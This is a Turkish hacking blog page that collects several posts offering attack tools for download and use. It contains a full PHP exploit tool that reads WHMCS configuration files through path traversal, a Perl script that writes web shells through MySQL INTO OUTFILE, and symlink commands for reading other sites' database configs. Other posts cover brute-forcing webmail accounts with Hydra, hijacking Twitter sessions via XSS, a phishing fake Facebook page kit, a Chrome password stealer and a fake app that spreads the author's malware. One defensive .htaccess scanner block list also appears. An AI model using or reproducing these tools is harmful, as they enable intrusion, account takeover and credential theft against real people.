-
21 Mayıs 2015 Perşembe
no image



İçindekiler

En İyi Ddos Programları
Brute Force
Arama Motoru
Sheller
Havij v1.16 Pro Portable
Gr3Enox Exploit Scanner


Arşivden Görüntüler;

Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.


Pakette Bulunan Programlar Hakkında Bilgi;
En İyi Ddos Programları (İçersinde İp Killer 2.0 DDos Programıda Bulunmaktadır Kurulum Ve Anlatım Linki Verilmiştir)
Brute Force (Admin/Şifre Düzenlenmiştir)
Arama Motoru
Sheller (Logsuzdur K2ll33d Ve Angel Shell Paylaşılmıştır Sadece 2 Tane Eklendi.)
Havij v1.16 Pro Portable
Gr3Enox Exploit Scanner (Bu program Sayesinde Sql, lfı, rfı ,xss - Aradığınız Dorktaki Siteleri Arar ve içlerinden Açık Olan Siteleri Bulur.)

İndir

İndir qeleshacker Hack paketi.rar
Kod:
Şifre: qeleshacker27

DEVAMINI OKU..
no image





Selamün aleyküm arkadaşlar.
Konuyu uzatmaya gerek duymuyorum.
Videoda herşey apaçık belli...
Sorun yaşayan ya da anlamadığı bir yer olan arkadaşlar PM yolu ile benimle iletişime geçebilirler.
Bir kaç etkisiz kod ve iki materyal kullanarak UD tekniğini anlattım.
Umarım yararlı olur...

Videoyu İzlemek İçin Tıklayın!!!

Materyalleri İndirmek İçin Tıklayın!!!

Source Kodlarını İndirmek İçin Tıklayın!!!

Materyal RarPASS : THT.TheEos
DEVAMINI OKU..
no image


Arkadaşlar Bildiğiniz Üzere Site Hackledikten Sonra Herhangibi Bir Siteye Girip Zone Alıyoruz

Bazı Arkadaşlarımız Üşendiği İçin Böyle Bir Program Yapmaya Karar Verdim 

İsteyen Kullansın İsteyen Kullanmasın

Program Mirror-Z.Comdan Toplu Veya Tek Bir Kayıt Alabilme Özelliğine Sahip


Program Görünüşü



Virüs Total

https://www.virustotal.com/tr/file/2...is/1432220628/

Program Link'İ

Dosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam
DEVAMINI OKU..
no image



Özellikleri
>Uygulama kullanılırken fake yorumlar eklenmeye devam eder.
>5 sayfalık önceden eklenmiş yorum bulunmaktadır.
>Uygulama başlatıldıktan sonra bulunan sonuçlar benzerlik yüzdesi ve şehir şeklinde sıralanır.
>Son aşamada ise facebook Photo Opener eklentisini yüklemeden Bulunan sonuçlardaki fotoğrafları görüntülenemeyceğini Download Btonundan uygulamayı indirebileceğinizi bildiren hata sayfası görüntülenir.
>İndirilen uygulama bizim virüsümüz olacaktır.

Ekran Görüntüleri
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.


Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.


Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.


Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.


Sadece Facebook Profilimde yaptığım paylaşımdan sonra botnetimden aldığım ekran görüntüsü
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.


TIKLA İNDİR

DEVAMINI OKU..
/ Zone Kasmak İstiyenler İçin Güzel Bir Exploit /







Kod:
<?php
/**
* WHCMS Cart Exploit Tool
* #projectx
* http://www.exploit-db.com/exploits/17999/
* Develop By : Group x3 | Dr.KroOoZ |
**/

# default payload
$payload = "cart.php?a=projectx&templatefile=../../../configuration.php";

# site checker


$check = --;

if(!empty($_GET['site']) && !empty($_GET['payload'])){

# yum yum!
$yum = array();

$payload = base64_decode($_GET['payload']);

$site = trim($_GET['site'],-/-);
$http = stristr($site,'http://-);
if($http){
$site = $http;
} else {
$site = "http://$site";
}

$exploit = -$site/$payload";

if ($stream = @fopen($exploit, 'r')) {
echo -<strong>- . $exploit . -</strong><br>-;

$data = trim(stristr(stristr(stream_get_contents($stream), -<?php'), -?>-, true), -<?php');
$data = explode(-;-,trim($data));
$data = array_filter($data);

foreach($data as $datum){
$datum = explode(-=-,$datum);
$yum[trim($datum[0])] = $datum[1];
}

echo -<pre>-;
print_r($yum);
echo -</pre>-;

# bug? causes apache to crash :O
// $pattern = -/<?php+(.|s)+?>/-;
// preg_match($pattern, $data, $matches);
// var_dump($matches);

fclose($stream);
} else {
$check = -<a target='_new' href=-$site/cart.php?a=projectx&templatefile=../../../configuration.php'>Press Here to Check Don't Forget See From Source</a>-;
}

}
?>
<html>
<head>
<title>WHCMS Exploit Tool</title>
<link rel="shortcut icon" type="image/jpg" href="http://www.theprojectxblog.net/wp-content/uploads/2011/10/cropped-297465_202385663163007_202385503163023_447971_677009595_a.jpg">
*********
body, input { background: black; color: white; font-family: calibri; font-size: 1.1em; }
input[type=text] { width: 600px; } input { border: solid 1px white; }
span { display: inline-block; width: 60px; margin-right: 10px; }
a { text-decoration: none; color: red; } img { float: left; margin-right: 10px; }
</style>
**********
var Base64 = {

// private property
_keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=-,

// public method for encoding
encode : function (input) {
var output = --;
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var i = 0;

input = Base64._utf8_encode(input);

while (i < input.length) {

chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);

enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;

if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}

output = output +
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);

}

return output;
},

// public method for decoding
decode : function (input) {
var output = --;
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;

input = input.replace(/[^A-Za-z0-9+/=]/g, --);

while (i < input.length) {

enc1 = this._keyStr.indexOf(input.charAt(i++));
enc2 = this._keyStr.indexOf(input.charAt(i++));
enc3 = this._keyStr.indexOf(input.charAt(i++));
enc4 = this._keyStr.indexOf(input.charAt(i++));

chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;

output = output + String.fromCharCode(chr1);

if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}

}

output = Base64._utf8_decode(output);

return output;

},

// private method for UTF-8 encoding
_utf8_encode : function (string) {
string = string.replace(/rn/g,"n");
var utftext = --;

for (var n = 0; n < string.length; n++) {

var c = string.charCodeAt(n);

if (c < 128) {
utftext += String.fromCharCode(c);
}
else if((c > 127) && (c < 2048)) {
utftext += String.fromCharCode((c >> 6) | 192);
utftext += String.fromCharCode((c & 63) | 128);
}
else {
utftext += String.fromCharCode((c >> 12) | 224);
utftext += String.fromCharCode(((c >> 6) & 63) | 128);
utftext += String.fromCharCode((c & 63) | 128);
}

}

return utftext;
},

// private method for UTF-8 decoding
_utf8_decode : function (utftext) {
var string = --;
var i = 0;
var c = c1 = c2 = 0;

while ( i < utftext.length ) {

c = utftext.charCodeAt(i);

if (c < 128) {
string += String.fromCharCode(c);
i++;
}
else if((c > 191) && (c < 224)) {
c2 = utftext.charCodeAt(i+1);
string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
i += 2;
}
else {
c2 = utftext.charCodeAt(i+1);
c3 = utftext.charCodeAt(i+2);
string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
i += 3;
}

}

return string;
}

}
</script>
</head>
<body>

<p align="left">

<img src="http://www.theprojectxblog.net/wp-content/uploads/2011/10/cropped-297465_202385663163007_202385503163023_447971_677009595_a.jpg" /> </p><form method='get' onSubmit="javascript:payload.value = Base64.encode(payload.value);->
<p align="left">
<span>target:</span> <input type='text' name='site' value='put url without http://-/> <?php echo $check; ?><br/>
<span>payload:</span> <input type='text' name='payload' value=-<?php echo $payload; ?>-/> <input type='submit' value='Exploit' /> </p></form><!-- brgzkreclwwp --><p align="center">Search For Site : <a href="http://www.bing.com/search?q=powered+by+whmcompletesolution+cart.php&go=&form=QBRE&filt=all">Press Here</a></p><p align="center">Develop By : Group x3 | Dr.KroOoZ</p><p align="center"><font size="3">Gerttz: ~ Group Hp-Hack</font></p></body></html>
DEVAMINI OKU..
[Priv8] MySQL Shell Upload




Kod:
#!/usr/bin/perl


use strict;

use warnings;

use DBI;

use DBD::mysql;

use IO::File;

use Term::ANSIColor qw(:constants);


sub main(){

print -\n┏━┓┏━┓╋╋╋┏━━━┓╋╋┏┓

┃┃┗┛┃┃╋╋╋┃┏━┓┃╋╋┃┃

┃┏┓┏┓┣┓╋┏┫┗━━┳━━┫┃

┃┃┃┃┃┃┃╋┃┣━━┓┃┏┓┃┃╋┏┓

┃┃┃┃┃┃┗━┛┃┗━┛┃┗┛┃┗━┛┃

┗┛┗┛┗┻━┓┏┻━━━┻━┓┣━━━┛

╋╋╋╋╋┏━┛┃╋╋╋╋╋╋┃┃

╋╋╋╋╋┗━━┛╋╋╋╋╋╋┗┛\n";

print -+++▲ Coded by SpyneT ▲\n";

print -+++▲ www.fb.com/SpyneT.Officielll ▲\n\n";

print BOLD BLUE,-\n[*]-,RESET,- [~] Information's Target [~]-;

print -\n\n\n";

print BOLD BLUE,-[*]-,RESET,- Host: -;
chomp(my $host = <stdin>);

print BOLD BLUE,-[*]-,RESET,- User: -;
chomp(my $user = <stdin>);

print BOLD BLUE,-[*]-,RESET,- Password: -;
chomp(my $pass = <stdin>);

print BOLD BLUE,-[*]-,RESET,- File of text , which will be uploaded to host : -;
chomp(my $arq = <stdin>);

print BOLD BLUE,-[*]-,RESET,- Path of site+Name of the final file: -;
chomp(my $path = <stdin>);


my $dsn = "dbi:mysql::$host:3306";
my $dbh = DBI->connect($dsn, $user, $pass,{
PrintError => 0,
RaiseError => 0
});

if(!$dbh) { die(BOLD RED,-\n[-]-,RESET,- Connection error\n\n"); }



my $f = new IO::File;
$f->open(-<$arq") or die $!;
my @file = <$f>;
chomp(@file);
my $text = join(--,@file);
chomp($text);

&AddSlashes($text);
$f->close;


my $sth = $dbh->prepare('SELECT -- . $text . -- INTO OUTFILE --.$path.---);

if(!$sth->execute()){

print BOLD RED -\n[-]-,RESET,- Failed to make file\n\n";

exit;

} else {

print GREEN -\n[+]-,RESET,- File are create !!!\n\n";

exit;

}

}



sub AddSlashes()

{

my $text = shift;

$text =~ s/\\/\\\\/g;

$text =~ s/-/\\-/g;

$text =~ s/-/\\-/g;

$text =~ s/\\0/\\\\0/g;

return $text;

}



&main();
 
DEVAMINI OKU..
no image





Bildiğiniz Üzere Bazen serverlarda siteden başka siteye geçerken bazılarının config yolları değişmiş oluyor wp-config.php iken atıyorum illegalizm.php diye değiştiriyorlar ve bilmeyen arkadaşlarımızda siteyi es geçiyorlar bu makalemizde saklanan/değiştirilen configi çekmeyi öğreniceksiniz..İlk olarak telnette cgi shellde normal config çeker gibi 
Kod:
ln -s /home/xxx/public_html/wp-load.php load.txt
wp-load.phpyi çekiyoruz çekmemizdeki amaç sıradan biri config değiştirirse wp-load.phpyi değiştirmek aklına gelmez wp-load.php'yi çektikten sonra açıyoruz ve aratıyoruz
Kod:
if ( file_exists( ABSPATH 
arattığımızda hemen karşısında configismi.php yazar değiştirilmiş olan configi bulmuş oluruz ve tekrardan 
Kod:
ln -s /home/xxx/public_html/configismi.php config.txt
yazıp gerçek configi çekmiş oluruz artık özgürce veritabınına bağlanbilirsiniz umarım açıklayıcı olmuştur sorularınızı konu altına yazabilirsiniz 
DEVAMINI OKU..
no image



Merhaba arkadaşlar bu kod dizini sizin kurmuş olduğunuz sitelerin daha güvenli olmalari için açik tarama sistemlerini tarama yapmalarini engellemeye yarar geliştirilebilir bir kod dizinidir. Bircık büyük alişveriş firmalarininda kullandıgı bu sistem cok basit olmasina karşin etkin bir sistemdir. Not [Pypass Edilebilir]

Kullanımı :




.htaccess dosyamızın içine aşağıdaki kodları aynen yapıştırıyoruz ve sitemizde açık tarayan programları engellemiş oluyoruz.

Açık tarama araçlarına kod içine eklenebilir.

Kod:
RewriteEngine On
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} ^w3af.sourceforge.net [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} SF [OR]
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} libwhisker [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]
RewriteCond %{HTTP:Acunetix-Product} ^WVS
RewriteRule ^.* http://127.0.0.1/ [R=301,L]
</IfModule>
DEVAMINI OKU..
no image



Selamun Aleyküm kardeşlerim,abilerim




Bugün sizleri Twitter’da mevcut bulunan Session Hijack açığından bahsedeceğim.

Bu açığı nasıl kullanabiliriz?

Bu açığı topluma açık olan ağlarda veya local ağınızda olan kişilerin paketlerini dinleyerek kullanabilirsiniz.

Ağımızda olmayan kişiler için tek başına bu açık bir işe yaramaz arkadaşlar hedefteki şahsın cookie bilgilerini çalmanız lazım.Peki bunu nasıl yapacağız diye soruyorsanız ilk önce kendi hostunuza Cookie sniffer kurmalısınız sonrada Twitter’da yeni bir açık aramanız gerek bu açığın genel ismi XSS dir.

Efendim neden Xss açığı bulmak zorundayız direk hostumuzun linkini atarız sazan avını başlatırız diyenler olabilir Twitter bunada bir güvenlik geliştirmiş attığınız her url’yi t.co uzantısıyla yönlendirirken cookieleriniz pirupak şekilde siliniyor bunun için hedefi xss bulduğunuz url ile yönlendirmeniz gerekiyor.

Bu açığı anlatırmısın?

Arkadaşlar bunu video yardımıyla anlatacağım videoda hafif aksaklıklar oldu kusura bakmayın..

Cookie’sini çaldığımız kişinin auth_token ve twimg değerinde bulunan userid’i değiştirerek kişinin hesap ayarlarına erişebilirsiniz telefon ekleyip telinize gelen kod aracılığıyla hesaba tamamen hükmedebilir yada şifreyi değiştirmeden twit atabilirsiniz.

Kişinin twitter kullanıcı id için Link

Bilgilerinden yararlandığım Emrullah Akdemir ve Loading abilerime teşekkür ederim...

Video Link 1    

Video Link 2Link 
DEVAMINI OKU..
no image

Selamun Aleyküm CW Ailesi

Direk konuya girelim arkadaşlar bu gün size Hydra aracı ile Hotmail/Gmail/Yahoo hesaplarını kırma mantığını göstereceğim.


Terminali açıp sh -c "xhydra" komutu ile hydra aracının arayüzlü versiyonunu çalıştırıyoruz.

Applications-->BackTrack-->Privilige Escalation-->Password Attacks-->Online Attacks-->hydra-gtk



Evet aracımız açıldı farkketdiyseniz sağ altta her düzenlemenin kod hali var bunuda hatırlatayım.

Evet ana mantığı anlatacağım

hotmail
server: smtp.live.com
port: 587

gmail
server: smtp.gmail.com
port: 465

yahoo
server: smtp.mail.yahoo
port:587




Evet değiştireceğimiz yerler Single Target’ı hotmail,gmail,yahoo hedef hangisinde ise onu yazıcağız.Biz burada hotmaili seçtik smtp.live.com

İkinci olarak port: 587

Üçüncü olarak protocol: smtp

Dördüncü olarak alttaki Be Verbose ve Show Attempts kutucuklarına tıklıyoruz.

Şimdi ikinci adım



Burada Username hedef adresi Password List’e wordlistimizi birde aşağıdaki Try login as password butonuna tıklayacağız.



Evet Start sekmesine gelip direk sol alttaki start butonuna tıklıyoruz ve şovu izliyoruz.

Arkadaşlar ben örnek olarak hotmail hesabı kırmayı anlattım...
Emeğe saygı... Selametle...
DEVAMINI OKU..
no image

Selamun Aleyküm Cw Ailesi Sizlere Php Kullanarak Veritabanlı Fake Bir Facebook Sayfası Nasıl Yapılır Onu Göstereceğim.
Öncelikle Bize Gerekenler Şunlar:

1-) Domain
2-) PHP Host
3-) FTP Programı
4-) Gerekli Dosyalar


Edit// Mr.Anderson

Linkler ve Dosyalar Güncellenmiştir.

Hem Türkçe hem İngilizce için İki Seçenek Olarak Hazırlanmıştır.

İndirmek için Tıklayınız

Veritabanı bilgilerinizi değiştirmeyi unutmayınız.
(Değiştirmeniz gerekenler
* login.php- * cw_fake/ayarverx.php- * cw_fake/cw.php)

EN Demo : http://www.engarch.com/fb/cwfk_en/
TR Demo : http://www.engarch.com/fb/cwfk_tr/

NOT : Uyarı ve bilgilendirme amaçlıdır. Sorumluluk kullanıcıya aittir !!!

Link yenilenmiştir. 

Görsel Anlatım :






















DEVAMINI OKU..
no image

Selamun Aleykum / Aleykum Selam 

Program Adı : DAY1 Stealer

Boyut : 277kb

Link : Dropbox


Build Ettiği Stealer ".exe" Halindedir!

Programı Python Dilinde yazmış bulunmaktayım. All OS çalışmakta
Ancak Build edebilmeniz için 2 Tane modül gerekli Bunların Linklerini vericeğim :) 

1.Modül(Pyinstaller)
2.Modül(Pywin32) Sistemine uygun olanı seçiniz 
Build Edildikten Sonra Stealer ; "C:\\Stealer.exe" Adresinde Bulunucaktır. "oluştur" Butonuna bastıktan sonra 45 sn Beklıyoruz..



Sadece Chrome Şifrelerini Postalar..
Böyle kalıcak mı ? Kalmıcak
Geliştirmem için Önerilerinizi Alabilirmiyim ? :)

___________________________________________
DEVAMINI OKU..